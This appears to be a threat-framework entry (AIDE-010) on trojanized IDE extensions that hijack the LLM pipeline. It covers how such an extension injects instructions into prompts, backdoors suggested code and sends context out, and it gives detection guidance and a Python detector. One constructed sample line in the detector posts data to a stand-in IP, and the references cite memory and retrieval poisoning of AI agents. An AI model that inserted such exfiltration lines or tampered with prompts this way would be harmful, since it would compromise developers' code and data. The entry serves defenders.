AIDE-010 | Tactic: Persistence | Coverage Level C | ATT&CK Aligned

LLM Extension/Plugin Trojanization

AIDE-010 | ATT&CK: T1176

Description

Adversary Behavior: An adversary develops and distributes a malicious IDE extension (or modifies a legitimate one) that operates at the extension API layer where LLM prompts are constructed, transmitted, and responses are received.

AI/IDE Mechanism: IDE extension ecosystems expose APIs that give extensions deep access to the LLM interaction pipeline: an extension can read prompts before transmission, modify them in transit, alter responses before display, and read telemetry and session data. Where the IDE has no per-extension permission model (VS Code, for example, runs all extensions in a shared extension host process with the same file-system and network access as the IDE itself), users install extensions on the basis of functionality and ratings and have no way to see how an extension interacts with the LLM subsystem.

Execution Path: The malicious extension intercepts prompts before they are sent to the LLM (capturing project context, code, and developer intent), modifies prompts in transit (injecting adversary instructions), alters responses before they are displayed to the developer (inserting backdoors into suggested code), or exfiltrates prompt/response content to an external endpoint.

Security Impact: The adversary gains persistent access to the full LLM interaction pipeline — all project context, developer queries, and generated code pass through the compromised extension. This enables continuous data exfiltration, persistent prompt manipulation, and supply chain compromise of all code generated through the affected IDE instance.

Platforms

Windows, macOS, Linux

Detection

Monitor extension installation and update events and track the permissions or API surface each extension uses, particularly access to LLM APIs. Compare LLM API responses observed at the network level (for example at an egress proxy that terminates TLS) with the content presented to the developer; any divergence indicates response modification between the provider and the editor. Inspect extension network traffic for connections to hosts other than the sanctioned LLM endpoints and for data exfiltration patterns.

Detecting Data Components (3)

Extension Installation
Events capturing the installation or update of IDE extensions.
Extension Configuration Change
Events capturing changes to extension configuration, including changes by LLM agents.
Extension API Call
Events capturing runtime API calls made by extensions, particularly those interacting with LLM pipelines.

Mitigations (1)

Extension Security Controls
Enforce extension allowlisting from verified publishers. Flag extensions requesting LLM API access combined with network permissions. Monitor extension API calls for prompt/response interception. Restrict sideloading from non-marketplace sources.
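Detection logic for two of the checks above (flagging an extension that both touches the LLM API surface and opens network connections outside an allowlist, and diffing the response captured on the wire against what the IDE displayed), as an added example that is not part of the AIDE page or of any IDE's own tooling. The event schema and field names, the API prefixes `lm.` and `chat.`, and the host allowlist are assumptions; the log lines and the response texts are constructed.

```python
"""Added detection sketch for AIDE-010 (not code from the AIDE project or any IDE).

Check 1: correlate per-extension runtime events and flag any extension that both
         calls the LLM-facing API surface and connects to a host outside the
         allowlist of sanctioned LLM endpoints.
Check 2: diff the LLM response captured at the network boundary against the text
         the IDE actually displayed, returning lines that were inserted in transit.

Event schema, field names, API prefixes and the allowlist are assumptions.
"""
import difflib
import json
from collections import defaultdict

# Constructed sample of "Extension API Call" and "Network Connection Creation"
# events, one JSON object per line (schema is assumed, not any real IDE's format).
SAMPLE_EVENTS = """
{"ts":"2026-02-23T10:00:01Z","ext":"publisher.helper","event":"api_call","api":"lm.sendRequest"}
{"ts":"2026-02-23T10:00:02Z","ext":"publisher.helper","event":"net_connect","host":"api.openai.com","port":443}
{"ts":"2026-02-23T10:00:03Z","ext":"evil.snippets","event":"api_call","api":"lm.sendRequest"}
{"ts":"2026-02-23T10:00:04Z","ext":"evil.snippets","event":"net_connect","host":"203.0.113.7","port":8443}
{"ts":"2026-02-23T10:00:05Z","ext":"theme.dark","event":"net_connect","host":"203.0.113.7","port":443}
{"ts":"2026-02-23T10:00:06Z","ext":"evil.snippets","event":"api_call","api":"chat.registerChatParticipant"}
"""

# Assumed organisational allowlist of LLM provider endpoints.
ALLOWED_LLM_HOSTS = {"api.openai.com", "api.anthropic.com"}
# Assumed prefixes of the LLM-facing extension API surface.
LLM_API_PREFIXES = ("lm.", "chat.")


def parse_events(text):
    """Parse newline-delimited JSON events; blank lines are ignored."""
    return [json.loads(line) for line in text.strip().splitlines() if line.strip()]


def flag_llm_plus_network(events, allowed_hosts=ALLOWED_LLM_HOSTS):
    """Return {extension_id: [non-allowlisted hosts]} for every extension that
    touched the LLM API surface AND connected outside the allowlist."""
    llm_users = set()
    offsite_hosts = defaultdict(set)
    for ev in events:
        if ev["event"] == "api_call" and ev["api"].startswith(LLM_API_PREFIXES):
            llm_users.add(ev["ext"])
        elif ev["event"] == "net_connect" and ev["host"] not in allowed_hosts:
            offsite_hosts[ev["ext"]].add(ev["host"])
    # Network access alone (theme.dark) or LLM access alone (publisher.helper)
    # is not flagged; only the combination is.
    return {ext: sorted(offsite_hosts[ext]) for ext in sorted(llm_users) if offsite_hosts[ext]}


def inserted_lines(wire_response, displayed):
    """Lines shown to the developer that are absent from the response captured
    on the wire, i.e. content an intermediary added before display."""
    diff = list(difflib.unified_diff(wire_response.splitlines(),
                                     displayed.splitlines(), lineterm="", n=0))
    # Skip the two '---'/'+++' header lines, then keep added content lines.
    return [line[1:] for line in diff[2:] if line.startswith("+")]


# Constructed pair: what the provider returned vs. what the IDE rendered.
WIRE_RESPONSE = "import requests\n\ndef fetch(url):\n    return requests.get(url).text\n"
DISPLAYED = ("import requests\n\ndef fetch(url):\n"
             "    requests.post('http://203.0.113.7/c', data=url)\n"
             "    return requests.get(url).text\n")


def run_checks():
    """Run both checks on the constructed samples and return the findings."""
    flagged = flag_llm_plus_network(parse_events(SAMPLE_EVENTS))
    tampered = inserted_lines(WIRE_RESPONSE, DISPLAYED)
    return flagged, tampered


if __name__ == "__main__":
    flagged, tampered = run_checks()
    for ext, hosts in flagged.items():
        print(f"ALERT {ext}: LLM API access + connections to {', '.join(hosts)}")
    for line in tampered:
        print(f"ALERT response modified, inserted line: {line!r}")
```

The correlation deliberately requires both signals: an extension that only calls the LLM API is the normal case for an AI assistant, and an extension that only makes off-allowlist connections is a separate (non-LLM) egress finding. The response diff only works if the wire capture and the displayed text are taken for the same request, so in practice both sides need a shared request identifier or timestamp to pair them.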

Data Sources

Network Traffic: Network Connection Creation
Network Traffic: Network Traffic Content
Process: Process Creation
Application Log: Application Log Content

References

mitre-attack
Maps to T1176 (Software Extensions, formerly Browser Extensions). ATT&CK v16 split the technique into T1176.001 Browser Extensions and T1176.002 IDE Extensions, so T1176.002 is the closest mapping. Coverage Level C: IDE extension persistence is not well covered in existing detection guidance.
https://attack.mitre.org/techniques/T1176
Windsurf SpAIware (Rehberger, Aug 2025)
Memory-persistent data exfiltration from Windsurf IDE — retrieval-independent persistence through IDE memory features.
https://embracethered.com/blog/
MemoryGraft
Indirect injection targeting LLM agent long-term memory; semantic imitation heuristic exploited — poisoned records dominate retrievals up to 47.9% on GPT-4o (arXiv:2512.16962, 2025)
https://arxiv.org/abs/2512.16962
CorruptRAG
Practical RAG poisoning requiring only single poisoned text injection; 13 methods benchmarked, existing defenses fail (arXiv:2504.03957, 2025)
https://arxiv.org/abs/2504.03957
Automated Dependency Side-Loading
AI extension trojanization vector — malicious extensions intercept AI-developer communication to inject unauthorized dependencies (InstaTunnel, Feb 2026)
https://medium.com/@instatunnel/automated-dependency-side-loading-the-invisible-supply-chain-attack-via-ai-extensions-fe615eb03f19
MalTool
5,287 real-world tools with embedded malicious behaviors demonstrate extension/plugin trojanization at scale (arXiv:2602.12194, Feb 2026)
https://arxiv.org/abs/2602.12194

STIX Metadata

type: attack-pattern
id: attack-pattern--050a43f9-e16a-48a7-9753-3a36c580d4cb
spec_version: 2.1
created: 2026-02-23T00:00:00.000Z
modified: 2026-02-23T00:00:00.000Z
created_by_ref: identity--f5b5ec62-ffbd-4afd-9ee5-7c648406e189
x_mitre_is_subtechnique: False
x_mitre_version: 0.1
x_mitre_status: mapped